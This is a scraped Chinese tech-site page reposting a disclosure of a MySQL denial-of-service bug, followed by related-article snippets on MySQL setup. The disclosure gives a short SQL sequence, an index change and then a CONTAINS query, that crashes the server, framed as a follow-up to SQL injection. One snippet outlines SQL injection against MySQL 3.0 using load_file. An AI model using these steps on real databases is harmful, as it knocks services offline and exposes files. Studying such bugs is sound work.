mysql 5.0.45 (修改)拒绝服务漏洞_Mysql

mysql 5.0.45 (修改)拒绝服务漏洞
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/

<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set

mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip>

时间: 2024-08-01 11:10:13

mysql 5.0.45 (修改)拒绝服务漏洞_Mysql的相关文章

mysql 8.0 安装配置方法教程_Mysql

一.安装mysql yum源 从官网http://dev.mysql.com/downloads/repo/yum/下载mysql最新的yum源的rpm安装包 wget http://repo.mysql.com//mysql57-community-release-el6-9.noarch.rpm 使用yum安装rpm包 yum install mysql57-community-release-el6-9.noarch.rpm 检测mysql yum源 yum repolist enable

mysql 5.0.67最新版替代MySQL 5.0.51b版本官方下载_Mysql

 功能新增或变更的:  安全增强:使严格控制的位置,从哪个用户定义的函数可以被载入, plugin_dir系统变量已的 backported从MySQL 5.1 .如果该值非空,用户定义函数对象的文件可以被加载,只有从目录中命名这个 变量.如果该值是空的,行为是用来前5.0.67适用于: UDF的对象文件必须设在一个目录是搜查你的系统 的动态链接. (错误# 37428 )  重要的变化:不兼容的变化: FEDERATED存储引擎是现在默认情况下禁用在. cnf文件发运与MySQL分布 (我- 

修改Linux下mysql 5.0.xx默认连接数

这段时间服务器崩溃2次,一直没有找到原因,今天看到论坛发出的错误信息邮件,想起可能是mysql的默认连接数引起的问题,一查果然,老天,默认连接数才100, 怎么够呀,在网上找了半天资料,有说修改my.cnf的,有说修改safe_mysqld,试了,前者无用,后者文件找不到:)原来是以前的版本跟现在的版本有所不同. 言归正传.我以centos 4.4 下面的mysql 5.0.33 手工编译版本为例说明: vi /usr/local/mysql/bin/mysqld_safe 找到safe_mys

MYSQL将表名称修改成大写的存储过程_Mysql

本文为大家分享了MYSQL将表名称修改成大写的存储过程,具体内容如下 1. 条件: 1.1 Mysql设置对大小写敏感2. 执行下述存储过程:  #call uppercase('库名') DROP PROCEDURE IF EXISTS uppercase; CREATE PROCEDURE uppercase(IN dbname VARCHAR(200)) BEGIN DECLARE done INT DEFAULT 0; DECLARE oldname VARCHAR(200); DECL

解决MySQL安装重装时出现could not start the service mysql error:0问题的方法_Mysql

当各位在安装.重装时出现could not start the service mysql error:0原因: 卸载mysql时并没有完全删除相关文件和服务,需要手动清除.  安装到最后一步execute时不能启动服务的解决方法:  首先,在管理工具->服务里面将MySQL的服务给停止(有的是没有安装成功,有这个服务,但是已经停止了的),win+R->cmd,打开命令提示符窗口,输入命令:sc delete mysql(查看服务,此时服务中已没有mysql),将已停的服务删除,卸载MySQL

关于mysql 3.0的注射的一点思路_漏洞研究

mysql 3.0的注射   对mysql的注射主要是靠union 的联合查询,但union只对版本4.0以上的有用,对3.0以下的就没用了..........   所以在mysql 3.0的数据库里没办法使用union进行跨表查询,但可以使用load_file   但是也不可以直接使用union替换出来. 下面就是我的一点思路:   得到版本:   mysql> select * from user where userid=1 and length(version())<10;   Emp

MySQL 8.0.0开发里程碑版发布!_Mysql

MySQL 开发团队于 12 日宣布 MySQL 8.0.0 开发里程碑版本(DMR)发布! 可能有人会惊奇 MySQL 为何从 5.x 一下跳跃到了 8.0.事实上,MySQL 5.x 系列已经延续了很多年,从被 Oracle 收购之前就是 5.1,而收购之后一直维持在 5.x,比如 5.5,5.6,5.7 等等.其实,如果按照原本的发布节奏,可以把 5.6.x 当成 6.x,5.7.x 当成 7.x.所以,只是换了版本命名方式而已. 不过这次发布的 MySQL 8.0.0 开发版本还是有不少

MySQL 5.0触发器参考教程第1/4页_Mysql

Conventions and Styles约定和编程风格 每次我想要演示实际代码时,我会对mysql客户端的屏幕就出现的代码进行调整,将字体改成Courier,使他们看起来与普通文本不一样(让大家区别程序代码和正文).在这里举个例子: mysql> DROP FUNCTION f; Query OK, 0 rows affected (0.00 sec) 如果实例比较大,则需要在某些行和段落间加注释,同时我会用将"<--"符号放在页面的右边以表示强调.例如: mysql&

Centos6.5在线安装mysql 8.0详细教程_Mysql

Centos6.5在线安装mysql 8.0的顺序如下,希望大家可以顺利进行安装. Mysql卸载从下往上顺序 [root@localhost /]# rpm -e --nodeps qt-MySQL-4.6.2-26.el6_4.x86_64 [root@localhost /]# rpm -e --nodeps mysql-server-5.1.71-1.el6.x86_64 [root@localhost /]# rpm -e --nodeps mysql-libs-5.1.71-1.el